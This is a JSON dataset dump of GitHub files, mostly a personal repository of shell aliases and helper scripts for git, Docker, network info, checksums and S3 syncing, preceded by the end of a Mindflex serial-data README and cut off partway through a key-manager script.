Mindflex\n* \tPair mindflex\n* \t`brew install ser2net`\n*\t\t/usr/local/sbin/ser2net -C 9999:raw:0:/dev/tty.mindflex-DevB:38400,XONXOFF -u\n* \tConfirm you are proxying serial traffic with: \n\t* \t`lsof -i :9999`\n* \tView Mindflex data:\n\t* \t`nc localhost 9999`\n\n## visualizing the Mindflex\n* \t[Serve](http://web.archive.org/web/20160305051535/https://echo.co/blog/os-x-1010-yosemite-local-development-environment-apache-php-and-mysql-homebrew) the [website directory](https://github.com/calebbarr/MindflexAlpha/tree/master/website) with any web server.\n* \tIt will listen on `8081` and visualize brainwaves using [flot](http://www.flotcharts.org/).\n"
}
] | 2 |
MartinHarding/chelys | https://github.com/MartinHarding/chelys | 9da586bb6515f6b17e135ff0ec8e57f706bdc5e1 | 522e07cf9c1311bf8314618fff2b17815339316d | 566f81184bc049dd35878e8973d5d57f7903746b | refs/heads/master | 2021-11-11T14:48:54.400372 | 2021-11-09T12:41:45 | 2021-11-09T12:41:45 | 227,717,978 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5748792290687561,
"alphanum_fraction": 0.5764895081520081,
"avg_line_length": 46.769229888916016,
"blob_id": "5b1c338b907116e11c249081e30ee27fe8a03a4c",
"content_id": "3a072f74c316d75b5873b498eed797a73db788e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 621,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 13,
"path": "/includes/command_defaults.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "# alias cp='cp -iv'\n# alias mv='mv -iv'\n# alias mkdir='mkdir -pv'\nalias ls='ls -FGlAh'\n# alias less='less -FSRXc'\n# alias resource=\"source ~/.bash_profile\"\n# alias edit=$EDITOR # Opens file or directory in Editor\n# alias f='open -a Finder ./' # Opens current directory in Finder\n# alias c='clear' # Clear terminal display\n# alias lsn='echo $(ls -1 | wc -l)' # Count of non-hidden files in current dir\n# alias which='type -all' # Find executables\n# alias PATHS='echo -e ${PATH//:/\\\\n}' # Echo all executable Paths\n# alias ps='ps aux'\n"
},
{
"alpha_fraction": 0.6461538672447205,
"alphanum_fraction": 0.6615384817123413,
"avg_line_length": 23.375,
"blob_id": "e7bebb4d0c967dae05e6afe70ab91c85b34babe9",
"content_id": "4dd9e826d4a547e35750390a74945a03f2c30af0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 195,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 8,
"path": "/bin/portkill",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Port kill finds the process hogging the port which is passed and kills it\n#\n# Usage:\n# portkill <PORT>\n\nlsof -nP -i4TCP:$1 | grep LISTEN | awk '{print $2}' | xargs kill\n"
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6136363744735718,
"avg_line_length": 7.800000190734863,
"blob_id": "87ad76d36f8d69bc79c4d269871dcb5eeed595cd",
"content_id": "548a9b39aeb5983f263e881f916d1508525705af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 5,
"path": "/bin/day",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n# Gets the current day\n\ndate +%j\n"
},
{
"alpha_fraction": 0.5629077553749084,
"alphanum_fraction": 0.5731593370437622,
"avg_line_length": 25.170732498168945,
"blob_id": "88a907015e0c169d5a0f6719d498e4bc5e48b67a",
"content_id": "fd0a3849d9de0bf1bda43a9f9c9b86ed21c90f58",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1073,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 41,
"path": "/bin/git-unfuck",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Unfuck things with a git repo\n#\n# Usage:\n# git unfuck submodules\n#\n# Options:\n# help|-h show this help menu\n# submodules|-s forgets all submodules as if you cloned the repo without submodule init\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nGIT_UNFUCK_SCRIPT_PATH=\"$0\"\n\ngit_unfuck() {\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'submodules'|d) git_unfuck_submodules $@;;\n 'help'|'--help'|-h|h|'') git_unfuck_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ngit_unfuck_help() {\n sed '/^#\\!.*/d' $GIT_UNFUCK_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_unfuck_submodules() {\n local _submodules\n _submodules=$(git config --file .gitmodules --get-regexp path | awk '{print $2}')\n for _submodule in $_submodules; do\n git submodule deinit -f -- $_submodule\n done\n}\n\ngit_unfuck $@\n"
},
{
"alpha_fraction": 0.5445343852043152,
"alphanum_fraction": 0.5506072640419006,
"avg_line_length": 30.870967864990234,
"blob_id": "4f75f8f98db17e418e14db8fd4517aebe6fcbb0e",
"content_id": "f13ab19e3a606ef08473e13bc974760bf579e5c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 988,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 31,
"path": "/bin/rdb",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Reset or migrate a Rails database using rake. Pass dev or test after the command to choose an environment.\n#\n# Usage:\n# rdb <COMMAND> <ENVIRONMENT>\n\nrdb() {\n local _command _environment\n while [ ! -z $1 ]; do\n case $1 in\n \"reset\") _command='rake db:drop db:create db:schema:load';;\n \"migrate\") _command='rake db:migrate';;\n \"dev\") _environment='development';;\n \"test\") _environment='test';;\n *) echo \"'$1' is not a valid argument\" && return 1;;\n esac\n shift\n done\n ! [[ \"$_command\" ]] && echo \"Pass a command ('reset', 'migrate')\" && return 1\n ! [[ \"$_environment\" ]] && echo \"Pass an environemnt ('test', 'dev')\" && return 1\n\n if [[ `echo \"$_command\" | grep 'db:drop'` ]] && [[ $_environment == 'development' ]]; then\n _command=\"$_command db:seed\"\n fi\n _final=\"RAILS_ENV=$_environment bundle exec $_command\"\n echo \"$_final\"\n eval $_final\n}\n\nrdb $@\n"
},
{
"alpha_fraction": 0.5560035705566406,
"alphanum_fraction": 0.5611559152603149,
"avg_line_length": 29.16216278076172,
"blob_id": "f2ad7ef5cf875b0e56d233864162def22ddda84d",
"content_id": "7e09cac82474113daa4bdf8dea68c40bdff34287",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 4464,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 148,
"path": "/chelys.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/zsh\n\n# A set of minimal utilities and scripts which hold up my world.\n#\n# Usage:\n# chelys <COMMAND>\n# chelys help <BIN | INCLUDE>\n# chelys (-h | --help)\n#\n# Commands:\n# doctor Checks Chelys for potential problems.\n# help Show help on a specific bin or include file.\n# fix Attempts to fix problems found by the doctor command.\n# reload Runs 'source ~/.chelys/chelys.sh' to reload all files without restarting your shell.\n# update Does a git pull against the default remote repository for Chelys.\n#\n# Options:\n# -h --help Show this screen.\n\nset -o pipefail\n\nCHELYS_PATH=$(CDPATH= cd -- \"$(dirname -- \"$0\")\" && pwd)\nCHELYS_SOURCED_COMMIT=$(cd $CHELYS_PATH; git rev-parse HEAD)\n\n# TODO: make bin linking optional\nexport PATH=\"$CHELYS_PATH/bin:$PATH\"\n\nCOLOR_CLEAR='\\e[0m'\nCOLOR_WARN='\\e[1;33mWARNING:'\nCOLOR_ERROR='\\e[1;31mERROR:'\n\nfor include_file in $CHELYS_PATH/includes/*; do\n source $include_file\ndone\n\nfor env_file in $CHELYS_PATH/bin/*.env; do\n source $env_file\ndone\n\nchelys() {\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'doctor'|d) chelys_doctor;;\n 'reload'|r) chelys_reload;;\n 'update'|u) chelys_update;;\n 'edit'|e) chelys_edit;;\n 'fix'|f) chelys_fix;;\n 'help'|'--help'|-h|h|'') chelys_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\nchelys_help() {\n local _cmd=$1 _file_path _runner _help_text\n\n if [[ $_cmd ]]; then\n _file_path=\"$CHELYS_PATH/bin/$_cmd\"\n else\n printf \"\\e[1;32m\"\n cat \"$CHELYS_PATH/turtle.txt\"\n echo $COLOR_CLEAR\n _file_path=\"$CHELYS_PATH/chelys.sh\"\n fi\n\n _runner=$(head -n1 $_file_path)\n\n if [[ \"$_runner\" == '#!'*sh ]] || [[ \"$_runner\" == '#!'*ruby ]]; then\n _help_text=$(sed '/^#\\!.*/d' $_file_path | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g')\n [[ $_help_text ]] && echo \"$_help_text\" || echo \"$COLOR_WARN $_file_path appears to have no help text.\"\n else\n echo \"$COLOR_ERROR $_file_path '$_runner' help headers are not supported.\"\n fi\n}\n\nchelys_reload() {\n echo \"Reloading Chelys...\"\n source $CHELYS_PATH/chelys.sh\n}\n\nchelys_doctor() {\n local _current_commit=\"$(cd $CHELYS_PATH; git rev-parse HEAD)\" _help_text\n if [[ $CHELYS_SOURCED_COMMIT != $_current_commit ]]; then\n echo \"$COLOR_WARN sourced commit is $CHELYS_SOURCED_COMMIT but current commit is $_current_commit $COLOR_CLEAR\"\n fi\n\n if [[ $(git status | grep 'working tree clean') ]] || echo \"$COLOR_WARN $CHELYS_PATH has uncomitted changes $COLOR_CLEAR\"\"\"\n\n for bin_file in $CHELYS_PATH/bin/*; do\n [[ $bin_file = *.env ]] && continue\n [[ -x \"$bin_file\" ]] || echo \"$COLOR_ERROR $bin_file is not executable $COLOR_CLEAR\"\n _help_text=$(chelys_help `basename $bin_file`)\n case $_help_text in\n *WARNING:*) echo $_help_text;;\n *ERROR:*) echo $_help_text;;\n *);;\n esac\n done\n}\n\nchelys_fix() {\n for bin_file in $CHELYS_PATH/bin/*; do\n [[ $bin_file = *.env ]] && continue\n [[ -x \"$bin_file\" ]] || echo \"Making '$bin_file' executable $COLOR_CLEAR\" && chmod +x $bin_file\n done\n}\n\nchelys_update() {\n ( cd $CHELYS_PATH; git pull )\n}\n\nchelys_edit() {\n if [[ -f $CHELYS_PATH/EDITOR ]]; then\n EDITOR=$(cat $CHELYS_PATH/EDITOR)\n else\n while true; do\ncat <<EOF\nNo default editor set, please choose one:\n1) VS Code: 'code -w'\n2) Nano 'nano'\n3) VIM 'vim'\n4) Enter your own\nEOF\n printf \"Choice: \"\n read -r CHOICE\n case $CHOICE in\n \"1\") EDITOR=\"code -w\"; break;;\n \"2\") EDITOR=\"nano\"; break;;\n \"3\") 
EDITOR=\"vim\"; break;;\n \"4\") printf \"Enter command: \"; read -r EDITOR; break;;\n *) echo \"$COLOR_ERROR invalid option '$CHOICE'$COLOR_CLEAR\";;\n esac\n done\n echo \"Do you want to make '$EDITOR' the default command for editing Chelys?\"\n echo \"You can always change this by modifying $CHELYS_PATH/EDITOR\"\n while true; do\n printf \"y/n: \"\n read -r CONFIRM\n case $CONFIRM in\n \"y\") echo \"$EDITOR\" > $CHELYS_PATH/EDITOR; break;;\n \"n\") break;;\n *) echo \"$COLOR_ERROR invalid option '$CONFIRM'$COLOR_CLEAR\";;\n esac\n done\n fi\n eval $EDITOR $CHELYS_PATH\n}\n"
},
{
"alpha_fraction": 0.5736568570137024,
"alphanum_fraction": 0.6048526763916016,
"avg_line_length": 22.079999923706055,
"blob_id": "b1c543d6201749b4e40cb008bde95c0eed224a65",
"content_id": "41ccbd87e489628eb483b544edec77dd10a0328d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 577,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 25,
"path": "/bin/chk",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Validates a file's SHA256 checksum against a pre-computed value\n#\n# Usage:\n# chk <FILE> <SHA256-SUM>\n\n__sha_actual=\"`shasum -a 256 $1 | awk '{print $1}'`\"\nif [ -f \"$2\" ]; then\n __sha_expected=\"`cat $2 | awk '{print $1}'`\"\nelse\n __sha_expected=\"`echo $2 | awk '{print $1}'`\"\nfi\n\nif [[ \"$__sha_actual\" == \"$__sha_expected\" ]]; then\n echo -e \"SUCCESS: Checksums match\\n\\\nExpected: $__sha_expected\\n\\\n Actual: $__sha_actual\"\n exit 0\nelse\n echo -e \"ERROR: Checksum does not match\\n\\\nExpected: $__sha_expected\\n\\\n Actual: $__sha_actual\"\n exit 1\nfi\n"
},
{
"alpha_fraction": 0.46666666865348816,
"alphanum_fraction": 0.48571428656578064,
"avg_line_length": 10.666666984558105,
"blob_id": "4cb1984e327b259f663be875714e71159d58e36d",
"content_id": "cde664caaf019db4e4adad3c415a5e22d2213774",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 105,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 9,
"path": "/includes/tower.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\ntower() {\n if [[ $1 ]]; then\n open $1 -a Tower\n else\n open . -a Tower\n fi\n}\n"
},
{
"alpha_fraction": 0.5828947424888611,
"alphanum_fraction": 0.5878289341926575,
"avg_line_length": 30.020408630371094,
"blob_id": "9ab49204113ae5144ee69d7c06368249e1dcd72d",
"content_id": "1cae0bec279376c8c28e322d4a88e66cee91b651",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 3040,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 98,
"path": "/bin/git-profile",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Manage git configurations in a profile-like way\n#\n# Usage:\n# git profile list\n# git profile use work\n# git profile save default\n# git profile backup\n#\n# Options:\n# help|-h show this help menu\n# list|-l list available profiles\n# use|-u <name> switch ~/.gitconfig to a given profile name\n# save|-s <name> save/overwrite profile with the current ~/.gitconfig\n# backup|-b create a backup of the current ~/.gitconfig\"\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nGIT_PROFILE_SCRIPT_PATH=\"$0\"\n\ngit_profile() {\n $(git_profile_init)\n\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'use'|u) git_profile_use $@;;\n 'list'|l) git_profile_list;;\n 'save'|s) git_profile_save $@;;\n 'backup'|b) git_profile_backup;;\n 'help'|'--help'|-h|h|'') git_profile_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ngit_profile_init() {\n if ! [[ -d ~/.git_profiles ]]; then\n echo \"~/.git_profiles directory not found, creating...\"\n mkdir -p ~/.git_profiles/backups\n if [ -f ~/.gitconfig ]; then\n echo \"Saving ~/.gitconfig to default. Run 'git profile help' for usage\"\n cp ~/.gitconfig ~/.git_profiles/default.gitconfig\n fi\n fi\n}\n\ngit_profile_help() {\n sed '/^#\\!.*/d' $GIT_PROFILE_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_profile_backup() {\n local timestamp=`date +%s`\n echo \"Backing up current config to ~/.git_profiles/backups/$timestamp\"\n cp ~/.gitconfig ~/.git_profiles/backups/$timestamp\n}\n\ngit_profile_list() {\n ls ~/.git_profiles | grep '.gitconfig' | sed 's/\\.gitconfig//g'\n}\n\ngit_profile_use() {\n profile_name=\"$1\"\n if [[ ! \"$profile_name\" || \"$profile_name\" == \"use\" ]]; then\n echo \"Must pass in a profile name. Use 'git profile list' to see available profiles.\"\n exit 1\n fi\n profile_path=~/.git_profiles/$profile_name.gitconfig\n if [ -f $profile_path ]; then\n git_profile_backup\n echo \"Switching ~/.gitconfig to profile '$profile_name'\"\n cp -f $profile_path ~/.gitconfig\n else\n echo \"Path $profile_path not found. Use 'git profile list' to see available profiles.\"\n exit 1\n fi\n}\n\ngit_profile_save() {\n profile_name=\"$1\"\n if [[ ! \"$profile_name\" || \"$profile_name\" == \"save\" ]]; then\n echo \"Must pass in a profile name. Use 'git profile list' to see available profiles.\"\n exit 1\n fi\n profile_path=~/.git_profiles/$profile_name.gitconfig\n timestamp=`date +%s`\n if [ -f $profile_path ]; then\n echo \"Backing up $profile_path to ~/.git_profiles/backups/$timestamp\"\n mv $profile_path ~/.git_profiles/backups/$timestamp\n fi\n echo \"Saving current git config as '$profile_name'\"\n cp -f ~/.gitconfig $profile_path\n}\n\ngit_profile $@\n"
},
{
"alpha_fraction": 0.42840376496315,
"alphanum_fraction": 0.43192487955093384,
"avg_line_length": 18.813953399658203,
"blob_id": "20d33a647f5eac1e77f14f332478bc0247917c79",
"content_id": "90c9536e30d326e1ea2225a18a458665687bb170",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 852,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 43,
"path": "/includes/docker.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\nd() {\n case $1 in\n \"stop\")\n docker stop $(docker ps -a -q)\n ;;\n \"remove\")\n docker stop $(docker ps -a -q)\n docker rm $(docker ps -a -q)\n ;;\n \"clean\")\n docker stop $(docker ps -a -q)\n docker rm $(docker ps -a -q)\n docker system prune --all --volumes\n ;;\n *) docker $@;;\n esac\n}\n\nds() {\n case $1 in\n \"restart\")\n docker-sync stop\n docker-sync clean\n docker-sync start\n ;;\n *) docker-sync $@;;\n esac\n}\nalias dss=\"docker-sync-stack\"\n\ndc() {\n case $1 in\n \"restart\")\n docker-compose restart\n ;;\n \"services\")\n docker-compose up -d database elasticsearch redis\n ;;\n *) docker-compose $@;;\n esac\n}\n"
},
{
"alpha_fraction": 0.5916278958320618,
"alphanum_fraction": 0.5981395244598389,
"avg_line_length": 62.235294342041016,
"blob_id": "9dbb3768665e3bc1b6cbe8dde77eb7fdcb431f5c",
"content_id": "006894de3089ef11dd4d3a5db4d1f475b94b502b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1075,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 17,
"path": "/includes/network.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "# ------------------------------------------------------------\n# - Interfaces\n# ------------------------------------------------------------\n\n# `ip` tool is in commands\nalias ips='ip -l -v'\nalias digip='dig +short myip.opendns.com @resolver1.opendns.com' # Faster public IP\nalias whatismyip='curl https://ifconfig.co' # Public facing IP Address\nalias netCons='lsof -i' # Show all open TCP/IP sockets\nalias flushDNS='dscacheutil -flushcache' # Flush out the DNS Cache\nalias lsock='sudo /usr/sbin/lsof -i -P' # Display open sockets\nalias lsockU='sudo /usr/sbin/lsof -nP | grep UDP' # Display only open UDP sockets\nalias lsockT='sudo /usr/sbin/lsof -nP | grep TCP' # Display only open TCP sockets\nalias ipInfo0='ipconfig getpacket en0' # Get info on connections for en0\nalias ipInfo1='ipconfig getpacket en1' # Get info on connections for en1\nalias openPorts='sudo lsof -i | grep LISTEN' # All listening connections\nalias showBlocked='sudo ipfw list' # All ipfw rules inc/ blocked IPs\n"
},
{
"alpha_fraction": 0.5601503849029541,
"alphanum_fraction": 0.5684210658073425,
"avg_line_length": 24.576923370361328,
"blob_id": "449940ffced24620a4459524e274b09ee1e55777",
"content_id": "4d9169e2f8965ba830e0ad593338bd2331204d3e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1330,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 52,
"path": "/bin/git-jira",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Shortcuts for getting to Jira tickets from the current branch based on the branch name and directory the repo is in.\n#\n# Usage:\n# git jira url\n# git jira open\n#\n# Options:\n# help|-h show this help menu\n# url url the current branch's predicted Jira URL\n# open open the current branch's predicted Jira URL\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nGIT_JIRA_SCRIPT_PATH=\"$0\"\n\ngit_jira() {\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'url'|d) git_jira_url $@;;\n 'open'|d) git_jira_open $@;;\n 'help'|'--help'|-h|h|'') git_jira_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ngit_jira_help() {\n sed '/^#\\!.*/d' $GIT_JIRA_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_jira_ticket_id() {\n git rev-parse --abbrev-ref HEAD | cut -d'/' -f1\n}\n\ngit_jira_organization_name() {\n basename $(dirname \"`git rev-parse --show-toplevel`\") | tr '[:upper:]' '[:lower:]'\n}\n\ngit_jira_url() {\n echo \"https://$(git_jira_organization_name).atlassian.net/browse/$(git_jira_ticket_id)\"\n}\n\ngit_jira_open() {\n open \"$(git_jira_url)\"\n}\n\ngit_jira $@\n"
},
{
"alpha_fraction": 0.5163204669952393,
"alphanum_fraction": 0.5163204669952393,
"avg_line_length": 36.44444274902344,
"blob_id": "a794f34b3236e450a6e981aaa6a714f5afeb7327",
"content_id": "c988b6759a56ded93a2faaae394e30b45bd0c9d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 337,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 9,
"path": "/bin/whereis",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n__results=`curl -s https://api.ipdata.co/$@`\n__city=\"`echo \"$__results\" | jp -u 'city'`\"\n__region=\"`echo \"$__results\" | jp -u 'region'`\"\n__country=\"`echo \"$__results\" | jp -u 'country_name'`\"\n[[ \"$__city\" ]] && printf \"$__city, \"\n[[ \"$__region\" ]] && printf \"$__region, \"\n[[ \"$__country\" ]] && printf \"$__country\\n\"\n"
},
{
"alpha_fraction": 0.5245901346206665,
"alphanum_fraction": 0.5404548048973083,
"avg_line_length": 24.904109954833984,
"blob_id": "f8eeaba494fbdc1fe70dfbe06fc79078bc6a987b",
"content_id": "72c6881bc398342acf2b5ea9f50583f4fffd71cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1891,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 73,
"path": "/bin/s3-sync-buckets",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Upload or download a S3 buckets to the current directory\n#\n# Usage:\n# s3-sync-buckets upload <BUCKETS>\n# s3-sync-buckets download <BUCKETS>\n# s3-sync-buckets download <BUCKETS> --profile <PROFILE>\n#\n# Options:\n# help|-h show this help menu\n# --profile which AWS named profile to use for the S3 commands\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nS3_SYNC_BUCKETS_SCRIPT_PATH=\"$0\"\n\ns3_sync_buckets() {\n local _cmd=$1 _buckets _profile=\"default\" _skip\n [[ $_cmd ]] && shift\n\n for arg in $@; do\n if [[ \"$arg\" = \"--profile\" ]]; then\n _profile=\"$2\"\n _skip=true\n elif [ $_skip ]; then\n _skip=false\n else\n _buckets+=(\"$arg\")\n fi\n shift\n done\n\n if [[ !\"$_buckets\" ]]; then\n echo \"Listing buckets...\"\n for _bucket in `aws s3 ls --profile $_profile | cut -d' ' -f3`; do\n _buckets+=(\"$_bucket\")\n done\n fi\n\n case $_cmd in\n 'upload'|u) git_sync_buckets_download $_profile $_buckets;;\n 'download'|d) git_sync_buckets_upload $_profile $_buckets;;\n 'help'|'--help'|-h|h|'') s3_sync_buckets_help;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ns3_sync_buckets_help() {\n sed '/^#\\!.*/d' $S3_SYNC_BUCKETS_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_sync_buckets_download() {\n local _profile=$1\n shift\n\n for _bucket in $@; do\n echo \"aws s3 sync $_bucket s3://$_bucket --profile $_profile\"\n done\n}\n\ngit_sync_buckets_upload() {\n local _profile=$1\n shift\n\n for _bucket in $@; do\n echo \"aws s3 sync s3://$_bucket $_bucket --profile $_profile\"\n done\n}\n\ns3_sync_buckets $@\n"
},
{
"alpha_fraction": 0.6326987743377686,
"alphanum_fraction": 0.6338185667991638,
"avg_line_length": 27.80645179748535,
"blob_id": "b76d5f8a3c8f66e42dfdf8d9ee39d90097cc99d7",
"content_id": "be71f3322ad92d6063f81e3746e6c84047ce3073",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 893,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 31,
"path": "/bin/git-ignore",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Open or add files directly to .gitignore of the current repository. Can be\n# run in sub-directories and will automatically add a relative path to the\n# repository root if. Passing no arguments will open the .gitignore file in\n# the editor specified by the $EDITOR environment variable.\n#\n# Usage:\n# git ignore\n# git ignore <FILES...>\n\ngit_ignore() {\n local repo=$(git rev-parse --show-toplevel)\n local gitignore=\"$repo/.gitignore\"\n local workdir=$(pwd)\n local file\n local arg\n\n # If no args just open in editor\n [[ -z $@ ]] && $EDTIOR $gitignore && return 0\n\n for file in $@; do\n # If file is in working directory, add as path relative to repo root\n [[ -f $file ]] && file=$(echo \"$workdir/$file\" | sed 's,'$repo/',,g')\n\n echo \"$file\" >> $gitignore\n echo \"Added '$file' to $gitignore\"\n done\n}\n\ngit_ignore $@\n"
},
{
"alpha_fraction": 0.5639490485191345,
"alphanum_fraction": 0.5743896961212158,
"avg_line_length": 32.224491119384766,
"blob_id": "eed85b190bd0c3e8239f3f6da41fa863a668ca64",
"content_id": "9164e58cb1a13f091bfeb2d993a1d8686eadcc02",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 6513,
"license_type": "permissive",
"max_line_length": 179,
"num_lines": 196,
"path": "/bin/key-manager",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Manage GPG and SSH keys\n#\n# Usage:\n# key-manager new gpg [email protected] 'Jane Doe'\n# key-manager new ssh [email protected]\n# key-manager extend gpg [email protected]\n# key-manager use [email protected]\n# key-manager which [email protected]\n# key-manager backup\n#\n# Options:\n# help|-h show this help menu\n# new|-n create a new GPG or SSH key\n# extend|-e extend an existing GPG key\n# use|-u switch Git signing and SSH id_rsa.pub keys to keys with this email\n# which|-w show key files that contain the email\n# backup|-b create a backup of the ~/.gnupg and ~/.ssh directories\n\n[[ $CLR ]] || CLR='\\033[0m'\n[[ $WRN ]] || WRN='\\033[1;33mWARNING:'\n[[ $ERR ]] || ERR='\\033[0;31mERROR:'\n\nKEY_MANAGER_SCRIPT_PATH=\"$0\"\n\nnext_year() {\n date -v+13m +%Y\n}\n\nsanitize() {\n echo $@ | sed -e 's/[^A-Za-z0-9_-]/_/g'\n}\n\nkey_manager_help() {\n sed '/^#\\!.*/d' $KEY_MANAGER_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\nkey_manager_init() {\n if ! [[ -d ~/.key_manager ]]; then\n echo \"~/.key_manager directory not found, creating...\"\n # mkdir -p ~/.key_manager/backups\n # # if [ -f ~/.gitconfig ]; then\n # # echo \"Saving ~/.gitconfig to default. Run 'git profile help' for usage\"\n # # cp ~/.gitconfig ~/.key_manager/default.gitconfig\n # # fi\n # [commit]\n # gpgsign = true\n # [gpg]\n # program = /usr/local/bin/gpg\n fi\n}\n\nkey_manager() {\n $(key_manager_init)\n\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'new'|n) key_manager_new $@;;\n 'use'|n) key_manager_use $@;;\n 'extend'|e) key_manager_extend $@;;\n 'backup'|b) key_manager_backup;;\n 